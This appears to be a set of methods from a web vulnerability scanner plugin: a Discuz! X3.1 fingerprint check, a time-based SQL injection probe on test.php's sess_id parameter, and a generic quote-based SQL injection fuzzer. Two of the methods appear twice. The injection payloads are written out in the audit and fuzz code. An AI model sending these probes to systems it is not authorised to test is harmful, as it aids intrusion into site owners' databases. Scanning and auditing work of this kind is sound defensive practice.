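 def fingerprint(self, target):
     """Report whether *target* presents the Discuz! X3.1 footer.

     Requests the host derived from ``target`` and looks for the literal
     "Powered by ... Discuz! ... X3.1" footer in the response body.

     Args:
         target: URL of the site being checked.

     Returns:
         True when the footer marker is found in a 200 response, False
         otherwise (non-200 status, empty body, or marker absent).
     """
     host = util.getHostByUrl(target)
     code, _head, body, _location, _error = util.sendHttpRequest(host)
     if code != 200 or not body:
         # The original fell off the end and returned None on a non-200
         # reply; callers treating the result as a bool now get False.
         # NOTE(review): what sendHttpRequest returns for body on failure is
         # not visible here — the emptiness guard assumes None/"" — confirm.
         return False
     # Plain substring test instead of re.search() on an unescaped literal,
     # where the "." in "www.discuz.net" matched any character.
     marker = '<p>Powered by <strong><a href="http://www.discuz.net">Discuz!</a></strong> <em>X3.1</em></p>'
     return marker in body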
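 def fingerprint(self, target):
     """Report whether *target* presents the Discuz! X3.1 footer.

     Requests the host derived from ``target`` and looks for the literal
     "Powered by ... Discuz! ... X3.1" footer in the response body.

     Args:
         target: URL of the site being checked.

     Returns:
         True when the footer marker is found in a 200 response, False
         otherwise (non-200 status, empty body, or marker absent).
     """
     host = util.getHostByUrl(target)
     code, _head, body, _location, _error = util.sendHttpRequest(host)
     if code != 200 or not body:
         # The original fell off the end and returned None on a non-200
         # reply; callers treating the result as a bool now get False.
         # NOTE(review): what sendHttpRequest returns for body on failure is
         # not visible here — the emptiness guard assumes None/"" — confirm.
         return False
     # Plain substring test instead of re.search() on an unescaped literal,
     # where the "." in "www.discuz.net" matched any character.
     marker = '<p>Powered by <strong><a href="http://www.discuz.net">Discuz!</a></strong> <em>X3.1</em></p>'
     return marker in body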
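    def audit(self, target):
        """Check ``test.php``'s ``sess_id`` parameter for a SQL-injection indicator.

        Two signals are accepted: a MySQL warning fragment echoed in the body,
        or a response delay inside the 1-3 s window that the original
        ``range(1, 3)`` comparison was evidently meant to express.  A hit is
        recorded through the base class's ``_addScanResult()``, which may be
        called more than once to record several findings.

        Args:
            target: URL of the site under test.

        Returns:
            True when an indicator was found and a result was recorded,
            False otherwise.
        """
        url_with_payload = util.getHostByUrl(target) + '/test.php?act=login&sess_id=1%27%20and%20sleep%283%29--%201'
        # perf_counter() replaces time.clock(), which was removed in Python 3.8
        # and on Unix measured process CPU time rather than wall time, so a
        # server-side delay was never observed by it.
        start = time.perf_counter()
        code, _head, body, _location, _error = util.sendHttpRequest(url_with_payload)
        elapsed = time.perf_counter() - start
        if code != 200:
            return False
        # NOTE(review): body is assumed to be None/"" on failure — confirm
        # against util.sendHttpRequest.
        error_echoed = bool(body) and '<b>Warning</b>:  INSERT INTO' in body
        # The old `elapsed in range(1, 3)` was only true for an elapsed time of
        # exactly 1.0 or 2.0 s; the intended window is written out here.
        # Ordinary network latency can also land in it, so on its own this is
        # a weak signal and worth re-checking before acting on a finding.
        delayed = 1 <= elapsed < 3
        if error_echoed or delayed:
            self._addScanResult({"method": "GET",  # HTTP verb used: GET/POST/HEAD
                                 "post_data": "",  # POST body carrying the payload, if POST
                                 "url": url_with_payload,  # URL with the payload filled in
                                 "vul_key": "sess_id"})  # parameter the finding concerns
            return True
        return False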
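    def fuzz(self, context):
        """Append a quote-based probe to one parameter and look for a SQL error.

        Args:
            context: dict with at least ``url`` (e.g.
                http://www.test.com/index.php?a=aaa&b=bbb&c=ccc), ``param``
                (the parameter to fuzz, e.g. ``b``), ``method`` and
                ``post_data``; the last two are copied into the result.

        Returns:
            True when a 200 response body contains "SQL Error" (the finding
            is recorded via ``_addScanResult()``), False otherwise.
        """
        url = context["url"]
        param = context["param"]
        payload = "1'+and+'1'%3d'1"

        # isAppend=True appends the payload after the existing value instead
        # of replacing it, e.g. ...&b=bbb1'+and+'1'%3d'1&c=ccc
        url_with_payload = util.fillPayload(url, param, payload, isAppend=True)

        code, _head, body, _location, _error = util.sendHttpRequest(url_with_payload)
        if code != 200 or not body:
            # NOTE(review): assumes body is None/"" on failure — confirm
            # against util.sendHttpRequest.
            return False
        # Raw string: "\w" in a plain literal is an invalid escape (a
        # SyntaxWarning on 3.12+).  The optional "\w?" on either side never
        # constrains the match, so the pattern is effectively "SQL Error".
        if re.search(r"\w?SQL Error\w?", body):
            self._addScanResult({"method": context["method"],
                                 "post_data": context["post_data"],
                                 "url": url_with_payload,  # URL with the payload filled in
                                 "vul_key": context["param"]})  # parameter the finding concerns
            return True
        return False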
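    def fuzz(self, context):
        """Append a quote-based probe to one parameter and look for a SQL error.

        Args:
            context: dict with at least ``url`` (e.g.
                http://www.test.com/index.php?a=aaa&b=bbb&c=ccc), ``param``
                (the parameter to fuzz, e.g. ``b``), ``method`` and
                ``post_data``; the last two are copied into the result.

        Returns:
            True when a 200 response body contains "SQL Error" (the finding
            is recorded via ``_addScanResult()``), False otherwise.
        """
        url = context["url"]
        param = context["param"]
        payload = "1'+and+'1'%3d'1"

        # isAppend=True appends the payload after the existing value instead
        # of replacing it, e.g. ...&b=bbb1'+and+'1'%3d'1&c=ccc
        url_with_payload = util.fillPayload(url, param, payload, isAppend=True)

        code, _head, body, _location, _error = util.sendHttpRequest(url_with_payload)
        if code != 200 or not body:
            # NOTE(review): assumes body is None/"" on failure — confirm
            # against util.sendHttpRequest.
            return False
        # Raw string: "\w" in a plain literal is an invalid escape (a
        # SyntaxWarning on 3.12+).  The optional "\w?" on either side never
        # constrains the match, so the pattern is effectively "SQL Error".
        if re.search(r"\w?SQL Error\w?", body):
            self._addScanResult({"method": context["method"],
                                 "post_data": context["post_data"],
                                 "url": url_with_payload,  # URL with the payload filled in
                                 "vul_key": context["param"]})  # parameter the finding concerns
            return True
        return False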